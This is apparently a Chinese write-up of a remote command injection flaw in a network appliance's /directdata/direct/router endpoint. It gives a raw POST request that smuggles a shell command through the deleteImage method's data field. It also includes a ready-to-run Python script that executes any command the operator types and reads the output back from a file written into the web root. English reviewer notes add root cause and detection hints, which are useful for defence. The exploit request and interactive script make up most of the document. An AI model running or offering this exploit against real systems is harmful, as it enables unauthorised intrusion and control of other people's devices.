自行搭建环境

image

漏洞路径:

/directdata/direct/router

数据包(从载荷看,deleteImage 方法的 data 参数中分号之后的内容会被当作系统命令执行,输出被重定向到 Web 根目录下的 test.txt):

POST /directdata/direct/router HTTP/1.1
Host: 192.168.1.86
Connection: close
Content-Length: 160
Upgrade-Insecure-Requests: 1

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

执行命令:

image

查看结果(访问 Web 根目录下的 /test.txt):

image

懒人脚本:

import requests
# Silences urllib3 warnings process-wide. The requests in cmd() pass
# verify=False, so TLS certificates are not validated and the warning that
# would normally flag this is hidden as well.
requests.packages.urllib3.disable_warnings()

# proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def cmd(urllist,cmdsr):
    """Replay the deleteImage request with ``cmdsr`` appended and print the result.

    Sends the JSON-RPC style body shown in the write-up to
    ``<urllist>/directdata/direct/router``, then fetches ``<urllist>/test.txt``
    and prints whatever that URL returns. Afterwards it prompts for another
    command and calls itself again unless the operator types ``T``.

    Args:
        urllist: Base URL of the appliance, e.g. ``https://host``; the paths
            are appended by plain string concatenation.
        cmdsr: Text placed after the ``;`` in the path argument of
            ``deleteImage``.

    Reviewer notes:
        * Root cause (inferred from the payload, not from server code): the
          path argument appears to reach a shell unescaped, so ``;`` starts a
          second command. The server-side fix is to validate the path and
          avoid building a shell command line from it.
        * Detection: POSTs to ``/directdata/direct/router`` with
          ``"method": "deleteImage"`` whose data contains shell
          metacharacters (``;``, ``>``), and an unexpected
          ``/var/www/html/test.txt``. This script never removes that file, so
          it remains readable over HTTP after a test run.
        * Only the length of the response body is checked, not the HTTP
          status. A non-empty error page is printed as if it were command
          output, so a non-empty response alone does not prove the host is
          vulnerable.
        * ``verify=False`` disables TLS certificate validation on both
          requests.
    """
    router_endpoint = urllist + '/directdata/direct/router'
    # The original file path is kept as a prefix; cmdsr is interpolated as-is.
    injected_path = "/var/www/html/d.txt;%s >/var/www/html/test.txt" % cmdsr
    payload = {
        "action": "SSLVPN_Resource",
        "data": [{"data": [injected_path]}],
        "f8839p7rqtj": "=",
        "method": "deleteImage",
        "tid": 17,
        "type": "rpc",
    }
    # The POST response itself is not inspected; the result is read back
    # through the file written into the web root.
    requests.post(url=router_endpoint, json=payload, verify=False)

    result_page = requests.get(url=urllist + '/test.txt', verify=False)
    output = result_page.text
    if not output:
        print('未读取到执行结果请检查命令是否正确,或不存在漏洞')
    # The banner and body are printed even when the body is empty.
    print('------------------------------执行结果----------------------------------\n')
    print(output)
    print('------------------------------------------------------------------------\n')

    next_cmd = input('输入下条需要执行的命令--退出输入T:')
    if next_cmd != 'T':
        # Recursion is used as the loop; each further command adds a stack frame.
        cmd(urllist, next_cmd)

if __name__ == '__main__':
    # Interactive entry point: read the base URL and the first command from
    # stdin, then hand both to cmd(). Neither value is validated here; the URL
    # is used verbatim as the prefix for both request paths.
    divider = '------------------------------------------------------------------------\n'
    print(divider)
    url = input('请输入url-格式为:https://xx.xx.xx.xx: ')
    print(divider)
    cmdsr = input('输入需要执行的命令:')
    print(divider)
    cmd(url, cmdsr)

image